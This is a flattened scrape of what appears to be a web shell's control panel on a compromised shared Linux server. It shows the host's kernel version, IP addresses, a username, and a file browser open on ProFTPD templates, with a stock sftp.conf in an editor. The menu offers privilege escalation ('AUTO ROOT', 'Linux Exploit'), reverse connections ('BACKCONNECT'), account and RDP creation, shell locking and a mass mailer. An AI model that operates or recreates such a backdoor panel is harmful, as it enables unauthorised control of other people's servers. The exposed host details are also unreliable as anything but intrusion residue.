Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
proftpd /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
dnsbl.conf
924
B
-rw-r--r--
geoip.conf
4.25
KB
-rw-r--r--
ldap.conf
701
B
-rw-r--r--
modules.conf
3.37
KB
-rw-r--r--
proftpd.conf
5.68
KB
-rw-r--r--
sftp.conf
1.16
KB
-rw-r--r--
snmp.conf
982
B
-rw-r--r--
sql.conf
862
B
-rw-r--r--
tls.conf
2.03
KB
-rw-r--r--
virtuals.conf
832
B
-rw-r--r--
welcome.msg
170
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sftp.conf
# # Proftpd sample configuration for SFTP connections. # # Once enabled, you can even disable the sftpserver support of OpenSSH on port 22. # To do that, comment out the Subsystem sftp /usr/lib/openssh/sftp-server # line in /etc/ssh/sshd_config and restart the service. # <IfModule mod_sftp.c> #SFTPEngine on #Port 2222 #SFTPLog /var/log/proftpd/sftp.log # # Configure all host keys, using the same host key # files that OpenSSH uses. # #SFTPHostKey /etc/ssh/ssh_host_rsa_key #SFTPHostKey /etc/ssh/ssh_host_dsa_key #SFTPHostKey /etc/ssh/ssh_host_rsa_key #SFTPHostKey /etc/ssh/ssh_host_ecdsa_key #SFTPHostKey /etc/ssh/ssh_host_ed25519_key # # Preferred authentication method is by keys # #SFTPAuthMethods publickey # # This is available only if mod_sftp_pam is used # #SFTPAuthMethods keyboard-interactive # # Use either # ssh-keygen -e -f ~user/.ssh/id_rsa.pub >/etc/proftpd/authorized_keys/user # or # ssh-keygen -e -f ~user/.ssh/authorized_keys >/etc/proftpd/authorized_keys/user # to convert users public keys in RFC4716 format. # #SFTPAuthorizedUserKeys file:/etc/proftpd/authorized_keys/%u # # Enable compression # #SFTPCompression delayed </IfModule>
Close